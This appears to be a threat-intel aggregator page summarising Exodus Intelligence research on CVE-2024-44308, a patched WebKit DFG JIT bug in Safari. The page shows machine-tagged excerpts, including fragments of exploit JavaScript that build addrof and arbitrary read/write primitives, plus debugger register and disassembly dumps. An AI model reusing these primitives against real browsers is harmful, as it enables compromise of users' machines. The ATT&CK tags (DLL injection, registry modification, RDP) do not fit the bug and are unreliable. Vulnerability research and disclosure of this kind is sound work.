TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Exodus Intelligence

Oops Safari, I think You Spilled Something!

Exodus Intel VRT · 2025-08-04 · Read original ↗

ATT&CK techniques detected

14 predictions
T1055.001Dynamic-link Library Injection
98%
“a value we have sprayed onto the stack that allows for corrupting a victim object. leverage this corruption into the exploitation primitives addrof and arbitrary read / writecontrolling the stacka common method for controlling an uninitialized stack value is stack - spraying. we …”
T1055.001Dynamic-link Library Injection
95%
“a stub located near the end of the compiled trigger ( ) function. the code here stores some registers to the stack and prepares the arguments for a function call, which turns out to be operationputbyvalsloppygeneric ( ). after the call, these registers are restored from the stack…”
T1055.001Dynamic-link Library Injection
77%
“addr, val ) { let temp = victimobj [ 1 ] ; victimobj [ 1 ] = i2f ( addr ) ; writeobj [ 0 ] = i2f ( val ) ; victimobj [ 1 ] = temp ; } let array = new array ( 0x10 ). fill ( 1. 1 ) ; print ( " [ debug ] before write : ", array [ 0 ] ) ; write ( read ( addrof ( array ) + 0x8n ), f2…”
T1055.001Dynamic-link Library Injection
75%
“##│ - 0a0 0x7ffec6c5f390 — 3 ─────────────────────────────────────────────────────────────────────────────────────── [ backtrace ] ─────────────────────────────────────────────────────────────────────────────────────── 0 0x7812bc4410fa none 1 0x0 none the jump takes us to a stub …”
T1055.001Dynamic-link Library Injection
72%
“##x753de0641670 mov r11d, dword ptr [ r11 ] 0x753de0641673 cmp r11d, eax 0x753de0641676 jb 0x753de06416c1 0x753de064167c movabs r11, 0x753ddf0002cb r11 = 0x753ddf0002cb 0x753de0641686 cmp byte ptr [ r11 ], 0 0x753de064168a je 0x753de064169f ───────────────────────────────────────…”
T1112Modify Registry
70%
“##──────────────────────────────── [ registers / show - flags off / show - compact - regs off ] ─────────────────────────────────────────────────────────────────── rax 0x7812bb58b880 — 0x1082d000000a320 rbx 0x7812bb500140 — 0x10018000000a400 rcx 0x77f800000000 — 0 rdx 0x77f8e2be0…”
T1055.001Dynamic-link Library Injection
53%
“##x7812fd014cc0 / * 0x7812fd014cc0be48 * / ─────────────────────────────────────────────────────────────────────────── [ disasm / x86 - 64 / set emulate on ] ──────────────────────────────────────────────────────────────────────────── 0x7812bc441859 movabs r11, 0x7812bb000010 r11…”
T1573.002Asymmetric Cryptography
52%
“##───────────────────── rax 0x7812bb58b880 — 0x1082d000000a320 rbx 0x7812bb500140 — 0x10018000000a400 * rcx 0x7812bb500140 — 0x10018000000a400 rdx 0x780801018138 — 0x7812bb500140 — 0x10018000000a400 rdi 0x7812bb500140 — 0x10018000000a400 rsi 0x7812fd019248 — 0x1082409000061d0 r8 …”
T1190Exploit Public-Facing Application
48%
“pac ) bypass, which researchers at exodus intelligence managed to succesfully acccomplish and chain with this exploit conclusionin november 2024, this bug was reported as cve - 2024 - 44308 and eventually patched by the following commit. the patch is very straightforward ; they s…”
T1055.001Dynamic-link Library Injection
44%
“the code that spills the existing value to the stack is never called, but the register allocator believes that this value is still stored on the stack. therefore, future ir operations will access a now uninitialized value. this vulnerability is interesting because it requires ver…”
T1055.001Dynamic-link Library Injection
39%
“##──────────── [ disasm / x86 - 64 / set emulate on ] ──────────────────────────────────────────────────────────────────────────── 0x7812bc4410fa jmp 0x7812bc4417f2 ↓ 0x7812bc4417f2 mov qword ptr [ rbp - 0x58 ], rax [ 0x7ffec6c5f3d8 ] = 0x7812bb58b880 — 0x1082d000000a320 0x7812bc…”
T1021.001Remote Desktop Protocol
36%
“##vsd xmm0, qword ptr [ rbp - 0x78 ] 0x7812bc44183b : mov rbx, qword ptr [ rbp - 0x70 ] 0x7812bc44183f : mov r9, qword ptr [ rbp - 0x60 ] 0x7812bc441843 : mov rdi, qword ptr [ rbp - 0x48 ] 0x7812bc441847 : mov r10d, 0x3 0x7812bc44184d : mov r8, qword ptr [ rbp - 0x50 ] 0x7812bc44…”
T1021.001Remote Desktop Protocol
36%
“+ 0x10 ] rdx, [ 0x7812bb58b890 ] = 0x77f8e2be0000 — 0 0x7812bc441092 movabs r11, 0x7ffffffff r11 = 0x7ffffffff 0x7812bc44109c and rdx, r11 rdx = 0xe2be0000 ( 0x77f8e2be0000 0x7ffffffff ) 0x7812bc44109f movabs r11, 0x77f800000000 r11 = 0x77f800000000 — 0 ──────────────────────────…”
T1055.001Dynamic-link Library Injection
30%
“##──────────────────────────────────────────────────────────────────────────── [ backtrace ] ─────────────────────────────────────────────────────────────────────────────────────── 0 0x7812bc441077 none 1 0x0 none the next part we want to verify is that the object pointer is prop…”

Summary

Overview In February 2023, researchers at Exodus Intelligence discovered a bug in the Data Flow Graph (DFG) compiler of WebKit, the browser engine used by Safari. This bug, CVE-2024-44308, was patched by Apple in November 2024. While it was alive, its exploit was chained with PAC and APRR bypasses on Apple Silicon to yield renderer ... Read more Oops Safari, I think You Spilled Something!

The post Oops Safari, I think You Spilled Something! appeared first on Exodus Intelligence.